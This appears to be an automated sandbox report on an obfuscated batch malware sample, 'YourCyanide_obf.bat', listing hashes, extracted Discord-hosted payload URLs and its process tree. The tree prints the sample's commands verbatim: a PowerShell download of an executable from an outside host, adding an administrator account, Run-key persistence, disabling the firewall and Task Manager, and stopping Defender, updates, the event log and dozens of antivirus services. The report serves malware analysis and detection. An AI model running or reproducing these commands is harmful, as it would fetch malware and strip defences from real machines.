Analysis
-
max time kernel
150s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
19-05-2022 17:52
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide_obf.bat
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
YourCyanide_obf.bat
Resource
win10v2004-20220414-en
General
-
Target
YourCyanide_obf.bat
-
Size
136KB
-
MD5
60105b0d25a609bbf93236f003064d2c
-
SHA1
bf5fae15e830e6793d2b5b60af0cbb92a4098663
-
SHA256
e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751
-
SHA512
b6d4259a2e1eca153d39299d1cfa16b2f1b07eead78b1afc8b4ebd6af17805c6d1112c6ed82e362430b7d6bf180822a3c44e819593da724706499e4c04b7d89c
Malware Config
Extracted
https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe
Extracted
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1640 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
NoKeyB.exepid process 1656 NoKeyB.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1036 cmd.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_7961_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide_obf.bat" reg.exe -
Drops file in Windows directory 4 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\Confession.bat cmd.exe File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe File created C:\Windows\Confession.bat cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 2692 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1500 taskkill.exe -
NTFS ADS 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\%tmDUu:~17 cmd.exe File opened for modification C:\Users\Admin\%etozn:~1 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exescrnsave.scrscrnsave.scrscrnsave.scrscrnsave.scrpid process 1752 powershell.exe 1752 powershell.exe 1640 powershell.exe 428 scrnsave.scr 968 scrnsave.scr 1620 scrnsave.scr 1488 scrnsave.scr -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exetaskkill.exescrnsave.scrscrnsave.scrscrnsave.scrscrnsave.scrdescription pid process Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 428 scrnsave.scr Token: SeDebugPrivilege 968 scrnsave.scr Token: SeDebugPrivilege 1620 scrnsave.scr Token: SeDebugPrivilege 1488 scrnsave.scr -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NoKeyB.exepid process 1656 NoKeyB.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
NoKeyB.exepid process 1656 NoKeyB.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
NoKeyB.exepid process 1656 NoKeyB.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1036 wrote to memory of 2016 1036 cmd.exe WScript.exe PID 1036 wrote to memory of 2016 1036 cmd.exe WScript.exe PID 1036 wrote to memory of 2016 1036 cmd.exe WScript.exe PID 1036 wrote to memory of 1752 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1752 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1752 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1108 1036 cmd.exe net.exe PID 1036 wrote to memory of 1108 1036 cmd.exe net.exe PID 1036 wrote to memory of 1108 1036 cmd.exe net.exe PID 1108 wrote to memory of 632 1108 net.exe net1.exe PID 1108 wrote to memory of 632 1108 net.exe net1.exe PID 1108 wrote to memory of 632 1108 net.exe net1.exe PID 1036 wrote to memory of 1728 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1728 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1728 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1848 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1848 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1848 1036 cmd.exe reg.exe PID 1036 wrote to memory of 1872 1036 cmd.exe rundll32.exe PID 1036 wrote to memory of 1872 1036 cmd.exe rundll32.exe PID 1036 wrote to memory of 1872 1036 cmd.exe rundll32.exe PID 1036 wrote to memory of 1640 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1640 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1640 1036 cmd.exe powershell.exe PID 1036 wrote to memory of 1656 1036 cmd.exe NoKeyB.exe PID 1036 wrote to memory of 1656 1036 cmd.exe NoKeyB.exe PID 1036 wrote to memory of 1656 1036 cmd.exe NoKeyB.exe PID 1036 wrote to memory of 1616 1036 cmd.exe net.exe PID 1036 wrote to memory of 1616 1036 cmd.exe net.exe PID 1036 wrote to memory of 1616 1036 cmd.exe net.exe PID 1616 wrote to memory of 1584 1616 net.exe net1.exe PID 1616 wrote to memory of 1584 1616 net.exe net1.exe PID 1616 wrote to memory of 1584 1616 net.exe net1.exe PID 1036 wrote to memory of 1244 1036 cmd.exe net.exe PID 1036 wrote to memory of 1244 1036 cmd.exe net.exe PID 1036 wrote to memory of 1244 1036 cmd.exe net.exe PID 1244 wrote to memory of 888 1244 net.exe net1.exe PID 1244 wrote to memory of 888 1244 net.exe net1.exe PID 1244 wrote to memory of 888 1244 net.exe net1.exe PID 1036 wrote to memory of 1500 1036 cmd.exe taskkill.exe PID 1036 wrote to memory of 1500 1036 cmd.exe taskkill.exe PID 1036 wrote to memory of 1500 1036 cmd.exe taskkill.exe PID 1036 wrote to memory of 836 1036 cmd.exe net.exe PID 1036 wrote to memory of 836 1036 cmd.exe net.exe PID 1036 wrote to memory of 836 1036 cmd.exe net.exe PID 836 wrote to memory of 952 836 net.exe net1.exe PID 836 wrote to memory of 952 836 net.exe net1.exe PID 836 wrote to memory of 952 836 net.exe net1.exe PID 1036 wrote to memory of 1984 1036 cmd.exe net.exe PID 1036 wrote to memory of 1984 1036 cmd.exe net.exe PID 1036 wrote to memory of 1984 1036 cmd.exe net.exe PID 1984 wrote to memory of 1424 1984 net.exe net1.exe PID 1984 wrote to memory of 1424 1984 net.exe net1.exe PID 1984 wrote to memory of 1424 1984 net.exe net1.exe PID 1036 wrote to memory of 1356 1036 cmd.exe netsh.exe PID 1036 wrote to memory of 1356 1036 cmd.exe netsh.exe PID 1036 wrote to memory of 1356 1036 cmd.exe netsh.exe PID 1036 wrote to memory of 1308 1036 cmd.exe net.exe PID 1036 wrote to memory of 1308 1036 cmd.exe net.exe PID 1036 wrote to memory of 1308 1036 cmd.exe net.exe PID 1308 wrote to memory of 820 1308 net.exe net1.exe PID 1308 wrote to memory of 820 1308 net.exe net1.exe PID 1308 wrote to memory of 820 1308 net.exe net1.exe PID 1036 wrote to memory of 892 1036 cmd.exe net.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7961_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\NoKeyB.exeNoKeyB.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
